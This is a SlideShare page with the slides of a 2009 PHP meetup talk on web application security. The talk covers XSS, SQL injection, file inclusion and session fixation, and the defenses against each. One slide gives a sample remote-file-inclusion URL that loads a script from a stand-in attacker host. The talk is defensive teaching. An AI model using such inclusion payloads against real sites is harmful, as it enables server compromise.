Security in PHP Applications By: Aditya Mooley Nagpur PHP Meetup August'09
Who Am I? <ul><li>Aditya Mooley ( [email_address] )
Zend Certified PHP 5 Engineer
Working with SANIsoft Technologies since last 6 years
Opensource contributor
Writing secure web applications </li></ul>
We will discuss ... <ul><li>Why Secure
What to Secure
How to Secure </li></ul>
Why secure? <ul><li>PHP is widely used programming language for web
Used by individuals as well as corporates
Handles lot of critical and sensitive information
Malicious users can misuse this information if they get access to it </li></ul>
Secure what? <ul><li>Secure code
Secure database
Secure web server </li></ul>
How to secure <ul><li>Follow some basic guidelines
register_globals is biggest evil. It must be off.
Don't use $_REQUEST. Use individual super globals instead.
Follow Thumb Rule -  </li><ul><li>Filter input
Upcoming SlideShare
Loading in...5
×

Security In PHP Applications

3,271

Published on

Seminar on various security issues faced by PHP developers and ways to avoid them.

The Examples used in the seminar can be downloaded from -> http://www.sanisoft.com/blog/wp-content/uploads/2009/08/security.tar.gz

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,271
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
126
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Transcript of "Security In PHP Applications"

  1. 1. Security in PHP Applications By: Aditya Mooley Nagpur PHP Meetup August'09
  2. 2. Who Am I? <ul><li>Aditya Mooley ( [email_address] )
  3. 3. Zend Certified PHP 5 Engineer
  4. 4. Working with SANIsoft Technologies since last 6 years
  5. 5. Opensource contributor
  6. 6. Writing secure web applications </li></ul>
  7. 7. We will discuss ... <ul><li>Why Secure
  8. 8. What to Secure
  9. 9. How to Secure </li></ul>
  10. 10. Why secure? <ul><li>PHP is widely used programming language for web
  11. 11. Used by individuals as well as corporates
  12. 12. Handles lot of critical and sensitive information
  13. 13. Malicious users can misuse this information if they get access to it </li></ul>
  14. 14. Secure what? <ul><li>Secure code
  15. 15. Secure database
  16. 16. Secure web server </li></ul>
  17. 17. How to secure <ul><li>Follow some basic guidelines
  18. 18. register_globals is biggest evil. It must be off.
  19. 19. Don't use $_REQUEST. Use individual super globals instead.
  20. 20. Follow Thumb Rule - </li><ul><li>Filter input
  21. 21. Escape output </li></ul></ul>
  22. 22. Security Issues <ul><li>Input validation
  23. 23. Cross site scripting
  24. 24. SQL Injection
  25. 25. File inclusion
  26. 26. Session fixation
  27. 27. and lot more ... </li></ul>
  28. 28. Input Validation <ul><li>Don't trust your users
  29. 29. Check every data coming from user
  30. 30. Use built-in PHP functions like - </li><ul><li>is_int, is_string, is_bool, etc.
  31. 31. ctype_* category of functions </li></ul><li>Whitelist over blacklist </li><ul><li>Check data for what is allowed instead of what is not allowed </li></ul></ul>
  32. 32. Cross site scripting (XSS) <ul><li>XSS is a situation where an attacker can inject a nicely crafted HTML string which when executed on client browser can cause unexpected results.
  33. 33. This may lead to - </li><ul><li>Session take over.
  34. 34. Setting malicious cookies
  35. 35. Access to restricted area </li></ul></ul>
  36. 36. XSS ... <ul><li>Let's see an example
  37. 37. XSS can be prevented by </li><ul><li>escaping the data with – htmlentities() or htmlspecialchars()
  38. 38. Filtering out the HTML tags with strip_tags() </li></ul></ul>
  39. 39. SQL Injection <ul><li>Code injection technique to exploit the vulnerability in SQL statements in code.
  40. 40. Can lead to - </li><ul><li>Removal of data
  41. 41. Access to critical information like passwords </li></ul><li>Can cause due to - </li><ul><li>Incorrect filtering of escape characters
  42. 42. Incorrect type handling </li></ul></ul>
  43. 43. SQL Injection ... <ul><li>Example1 , Example2
  44. 44. SQL injection can be prevented by - </li><ul><li>mysql_real_escape_string() and similar functions
  45. 45. Typecasting data properly before passing to SQL
  46. 46. Using Prepared Statements (MySQLi/PDO) </li></ul></ul>
  47. 47. File Inclusion <ul><li>A technique by which an attacker can include a file from remote location or from same server which is not intended for general users
  48. 48. Attacker can get shell access to the server which can be used to any extent.
  49. 49. Such attacks can be prevented by properly filtering the input data before using it in include statement. </li></ul>
  50. 50. File Inclusion ... <ul><li>Remote File Inclusion </li><ul><li>http://mysite.com/index.php?page=http://hacker.com/hacker.php </li></ul><li>Local File Inclusion </li><ul><li>Attacker can send a relative path which can include a secret file on webserver even out of webroot.
  51. 51. Example . </li></ul></ul>
  52. 52. Session Fixation <ul><li>Through this technique, attacker can get access to the valid session of a user.
  53. 53. After this, there is no way for the website to differentiate between the two.
  54. 54. Attacker can perform all the actions that are allowed to the original user.
  55. 55. Example . </li></ul>
  56. 56. Session Fixation ... <ul><li>Session hijacking can be prevented by generating a new session id everytime a user logs in.
  57. 57. This can be done with session_regenerate_id()
  58. 58. For extra security disable the ini setting session.use_trans_sid </li></ul>
  59. 59. Much more <ul><li>Web applications can be exploited by numerous other ways.
  60. 60. Refer - </li><ul><li>http://www.phpwact.org/security/risk/catalog
  61. 61. http://www.phpwact.org/security/attack/catalog </li></ul></ul>
  62. 62. References <ul><li>http://www.php.net
  63. 63. http://en.wikipedia.org
  64. 64. http://www.phpwact.org </li></ul>
  65. 65. Examples used in this presention can be downloaded from http://www.sanisoft.com/blog/wp-content/uploads/2009/08/security.tar.gz
  66. 66. Thanks
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×